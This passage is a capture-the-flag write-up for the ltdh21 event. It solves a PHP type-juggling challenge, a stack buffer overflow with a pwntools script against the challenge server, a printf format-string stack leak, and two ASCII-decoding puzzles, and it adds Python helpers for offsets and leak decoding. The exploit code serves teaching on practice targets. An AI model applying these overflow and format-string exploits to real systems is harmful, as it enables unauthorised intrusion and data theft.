<h3 id="exception-not-found">Exception not Found</h3>
<ul>
<li>Description: Sometimes I get a call from my bank, and the first thing they ask is, ‘Mr. Mitnick, may I get your account number?’ And I’ll say, ‘You called me! I’m not giving you my account number!</li>
<li>Solves: 11</li>
</ul>
<p>Similar to PHP Trickery, adding the source= parameter reveals the PHP source:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"flag.php"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"source"</span><span class="p">])){</span>
<span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="n">inverse</span><span class="p">(</span><span class="nv">$x</span><span class="p">,</span> <span class="nv">$flag</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$x</span> <span class="o">==</span> <span class="s2">""</span><span class="p">){</span>
<span class="k">throw</span> <span class="k">new</span> <span class="nc">Exception</span><span class="p">(</span><span class="s2">"Not today Sucker"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$x</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="k">new</span> <span class="nc">Exception</span><span class="p">(</span><span class="nv">$flag</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">1</span><span class="o">/</span><span class="nv">$x</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">try</span> <span class="p">{</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])){</span>
<span class="k">echo</span> <span class="s2">"Your answer is: "</span> <span class="mf">.</span> <span class="nf">inverse</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">],</span> <span class="nv">$flag</span><span class="p">)</span> <span class="mf">.</span> <span class="s2">"<br>"</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nc">Exception</span> <span class="nv">$e</span><span class="p">)</span> <span class="p">{</span>
<span class="k">echo</span> <span class="s1">'Caught exception: '</span><span class="p">,</span> <span class="nv">$e</span><span class="o">-></span><span class="nf">getMessage</span><span class="p">(),</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?></span>
</code></pre></div></div>
<p>This looks similar to PHP Trickery; again we need to supply a value to the _ parameter. This time we need to trigger the exception whose message is $flag, which is thrown when !$x is true but $x == "" is not. Setting _ = 0 does this: the string "0" is not equal to "" but is falsy in PHP.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://exception.enusec.org/index.php?_=0
Caught exception: ltdh21{D0S_By_D1v1si0n}
</code></pre></div></div>
<hr />
<h2 id="pwn">Pwn</h2>
<h3 id="pwn101">Pwn101</h3>
<ul>
<li>Description: For the average home-user, anti-virus software is a must.</li>
<li>Solves: 10</li>
</ul>
<p>For this challenge we are provided main.c, the compiled main binary and an nc session which runs the same binary remotely.</p>
<p>main.c:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <string.h>
#include <stdio.h>
</span>
<span class="kt">void</span> <span class="nf">secret</span><span class="p">()</span> <span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"ltdh21{N0t_T0dAy_SuCK3r5}</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">name</span><span class="p">()</span> <span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"What is your name: "</span><span class="p">);</span>
<span class="kt">char</span> <span class="n">str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">gets</span><span class="p">(</span><span class="n">str</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">str</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span> <span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span> <span class="p">)</span> <span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"There is a secret at: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">secret</span><span class="p">);</span>
<span class="n">name</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This is a simple buffer overflow challenge. Running the binary we are prompted for a name, which is then echoed back. The binary also prints the memory address of the secret() function, which is where we want to redirect execution.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./main
There is a secret at: 0x5660020d
What is your name:
JDMCE
Hello JDMCE
</code></pre></div></div>
<p>This address changes each time the binary is run (the binary is position-independent, so ASLR loads it at a different base every time), so the exploit script has to read it from the program's output rather than hard-code it.</p>
<p>We can cause a segmentation fault by overflowing the input buffer, which the source tells us is str[20] and is filled by gets() with no length check. Using gdb/gef I determined the offset required to overwrite $eip, which is 32, so we can now write an exploit script:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="c1">#p = process('./main')
</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"206.189.123.169"</span><span class="p">,</span> <span class="mi">5001</span><span class="p">)</span>
<span class="n">output</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()</span>
<span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">output</span><span class="p">)</span>
<span class="n">win_addr</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"0[xX][0-9a-fA-F]+"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">output</span><span class="p">))</span>
<span class="n">win_addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">win_addr</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s">"Win address = </span><span class="si">{</span><span class="n">win_addr</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
<span class="n">offset</span> <span class="o">=</span> <span class="mi">32</span>
<span class="n">junk</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">*</span> <span class="n">offset</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">[</span><span class="n">junk</span><span class="p">,</span> <span class="n">p32</span><span class="p">(</span><span class="n">win_addr</span><span class="p">)]</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 exp.py
<span class="o">[</span>+] Opening connection to 206.189.123.169 on port 5001: Done
<span class="o">[</span><span class="k">*</span><span class="o">]</span> There is a secret at: 0x5662620d
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Win address <span class="o">=</span> 1449288205
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode
What is your name:
bbV
ltdh21<span class="o">{</span>Y0u_JuST_Pwn3d_Th1s_BaD_Bo1s<span class="o">}</span>
</code></pre></div></div>
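<p>The offset of 32 used above was found with a cyclic pattern in gdb/gef. As an added example (not the writeup's own code), here is that step in pure Python with no pwntools dependency: pattern_create builds a Metasploit-style non-repeating pattern to send as the name, pattern_offset looks up where the four bytes that landed in EIP sit in that pattern, and build_payload produces the same padding-plus-address layout the exploit script uses. The crashed EIP value 0x31624130 is constructed for the example (it is what a crash at offset 32 with this pattern would report), and the secret() address is the one from the local run above.</p>

```python
#!/usr/bin/env python3
"""Find the EIP overwrite offset with a cyclic pattern (no pwntools needed).

Added example, not part of the original writeup. It reproduces the
gdb/gef "pattern create / pattern offset" step that gave the offset of 32:
send a non-repeating pattern as the name, read the faulting EIP from the
debugger, and look up where those four bytes sit in the pattern.
"""
import string
import struct
from typing import Optional

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> bytes:
    """Metasploit-style pattern Aa0Aa1...Aa9Ab0Ab1...; every 4-byte window
    is unique, so any dword read from EIP maps to exactly one offset."""
    out = []
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out.append(u + lo + d)
                if len(out) * 3 >= length:
                    return "".join(out).encode()[:length]
    return "".join(out).encode()[:length]


def pattern_offset(eip: int, length: int = 1024) -> Optional[int]:
    """Offset of the 4 bytes that ended up in EIP (32-bit, little-endian)."""
    needle = struct.pack("<I", eip)
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None


def build_payload(offset: int, win_addr: int) -> bytes:
    """Padding up to the saved return address, then the address of secret()."""
    return b"A" * offset + struct.pack("<I", win_addr)


if __name__ == "__main__":
    # Constructed: the EIP value gef would show after crashing on this pattern.
    crashed_eip = 0x31624130           # bytes "0Ab1" read as a little-endian dword
    off = pattern_offset(crashed_eip)  # 32 for this value
    print(pattern_create(48).decode(), off)
    print(build_payload(off, 0x5660020D))
```

<p>In practice you send pattern_create(100) as the name under gdb, read EIP from the crash, and feed it to pattern_offset; the 12 bytes between the end of str[20] and the saved return address are compiler padding and the saved EBP, which is why the offset is 32 rather than 20.</p>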
<hr />
<h3 id="leak-monster">Leak Monster</h3>
<ul>
<li>Description: Can someone call a plumber?</li>
<li>Solves: 10</li>
</ul>
<p>For this challenge we are provided main.c and an nc session.</p>
<p>main.c:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
#include <string.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">text</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="kt">char</span> <span class="n">flag</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"AAAA"</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Whats your Name Mr plumber: "</span><span class="p">);</span>
<span class="n">fgets</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="mi">1024</span> <span class="p">,</span> <span class="n">stdin</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hello there "</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The source is a textbook example of how not to use printf(): the user-supplied text is passed as the format string itself, so any conversion specifiers in it are honoured. Each %08x consumes the next 4-byte word from the stack (32-bit calling convention, arguments on the stack), so a chain of them walks upward into main()'s frame, where the flag[] array and our own text[] buffer live. The remote binary evidently holds the real flag in that array rather than the "AAAA" placeholder shown in the source.</p>
<p>The following input leaks the first twenty words of the stack:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nc 206.189.123.169 5000
Whats your Name Mr plumber: AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
Hello there AAAA00000400.f7ee1580.5662424b.f7cff4d4.f7ee97c0.f7ee9110.ffd61754.00000009.00000001.f7d0268c.64746cd8.7b313268.336d3053.5f336e6f.4c6c4163.505f415f.424d756c.007d7233.41414141.78383025.
</code></pre></div></div>
<p>The leading AAAA acts as a marker: we find the resulting 41414141 among the leaked words and look at the ones preceding it. Using CyberChef I swap the endianness and convert from hex to get the flag.</p>
<p><img src="https://jdmce.com/assets/ltdh21/leakflag.jpg" alt="Leak" /></p>
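<p>As an added example (not part of the original writeup), the same decoding step done in Python: the script parses the %08x output shown above, embedded here as constructed input, finds the AAAA marker, reassembles the words before it in little-endian order and searches those bytes for the flag. The flag format ltdh21{...} and the 32-bit word size come from the page; the function names are mine.</p>

```python
#!/usr/bin/env python3
"""Turn a printf() %08x stack leak back into bytes and pull out the flag.

Added example for the Leak Monster challenge, not the original writeup's code.
The marker AAAA (0x41414141) is the start of our own input buffer, so the
words printed before it are what sits lower on the stack in main()'s frame,
including the flag[] array.
"""
import re
import struct
from typing import List, Optional

MARKER = "AAAA"
# Flag format taken from the challenge (ltdh21{...}).
FLAG_RE = re.compile(rb"ltdh21\{[^}]*\}")

# Constructed input: the reply shown above, minus the "Hello there " prefix.
LEAK_LINE = (
    "AAAA00000400.f7ee1580.5662424b.f7cff4d4.f7ee97c0.f7ee9110.ffd61754."
    "00000009.00000001.f7d0268c.64746cd8.7b313268.336d3053.5f336e6f."
    "4c6c4163.505f415f.424d756c.007d7233.41414141.78383025."
)


def build_format_string(words: int, marker: str = MARKER) -> str:
    """The input to send: a marker followed by one %08x per stack word wanted."""
    return marker + "%08x." * words


def parse_leak(line: str, marker: str = MARKER) -> List[int]:
    """Split the service reply into the 32-bit words printf() leaked."""
    body = line[len(marker):] if line.startswith(marker) else line
    return [int(w, 16) for w in body.split(".") if w]


def stack_bytes(words: List[int]) -> bytes:
    """Re-assemble the words as they sit in memory (x86 is little-endian)."""
    return b"".join(struct.pack("<I", w) for w in words)


def recover_flag(line: str, marker: str = MARKER) -> Optional[str]:
    """Locate the marker word and search the bytes below it for the flag."""
    words = parse_leak(line, marker)
    marker_word = struct.unpack("<I", marker.encode())[0]  # 0x41414141
    if marker_word not in words:
        return None  # leak did not reach our buffer: send more %08x
    below = stack_bytes(words[: words.index(marker_word)])
    hit = FLAG_RE.search(below)
    return hit.group(0).decode() if hit else None


if __name__ == "__main__":
    print(build_format_string(20))
    print(recover_flag(LEAK_LINE))
```

<p>For a 64-bit target the same approach works with %016lx and 8-byte ("&lt;Q") words. The fix on the C side is simply printf("%s", text): the input is then only ever data, never a format string.</p>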
<h2 id="misc">Misc</h2>
<h3 id="oooo-some-latine">oooo some Latine</h3>
<ul>
<li>Description: George indiget aliquo auxilio, non potest se adiuvare vos?</li>
<li>Solves: 23</li>
</ul>
<p>We are given an nc session to connect to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc 167.99.86.217 9000
._ o o
\_`-)|_
,"" \
," ## | ಠ ಠ.
," ## ,-\__ `.
," / `--._;)
," ## /
," ## /
87 104 97 116 32 105 115 32 116 104 101 32 76 97 116 105 110 32 102 111 114 32 102 108 97 103 63
enter "exit" to quit
George:
</code></pre></div></div>
<p>The numbers are ASCII codes and decode to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What is the Latin for flag?
</code></pre></div></div>
<p>The Latin for flag is vexillum. Typing vexillum at the prompt returns its ASCII values; typing those ASCII values back in returns the flag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>George: vexillum
vexillum
118 101 120 105 108 108 117 109
87 104 97 116 32 105 115 32 116 104 101 32 76 97 116 105 110 32 102 111 114 32 102 108 97 103 63
enter "exit" to quit
George: 118 101 120 105 108 108 117 109
118 101 120 105 108 108 117 109
You have found the flag! ltdh21{L4t1n_1s_t00_34sy}
87 104 97 116 32 105 115 32 116 104 101 32 76 97 116 105 110 32 102 111 114 32 102 108 97 103 63
enter "exit" to quit
George:
</code></pre></div></div>
<hr />
<h3 id="dont-ascii-me-again">Don’t Ascii Me Again</h3>
<ul>
<li>Description: Stop Ascii me questions!</li>
<li>Solves: 16</li>
</ul>
<p>Again we are given an nc session to connect to. It prints a long list of numbers and tells us to decode the message to get the flag.</p>
<p>I noticed that typing a character at the prompt returns 5 numbers; repeating the character changes the numbers, but they always add up to the ASCII value of the character:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>: a
57 6 9 22 3
: a
8 31 9 33 16
:
57+6+9+22+3=97=a
</code></pre></div></div>
<p>To decode the message we need to group the numbers into chunks of 5, sum each chunk, then convert the sums to text. I wrote the following Python script:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="n">nums</span> <span class="o">=</span> <span class="p">[</span><span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">57</span><span 
class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">62</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span 
class="mi">11</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">74</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">12</span><span 
class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">62</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">45</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span 
class="mi">8</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">66</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">37</span><span 
class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">61</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> 
<span class="mi">23</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">41</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span 
class="mi">30</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span 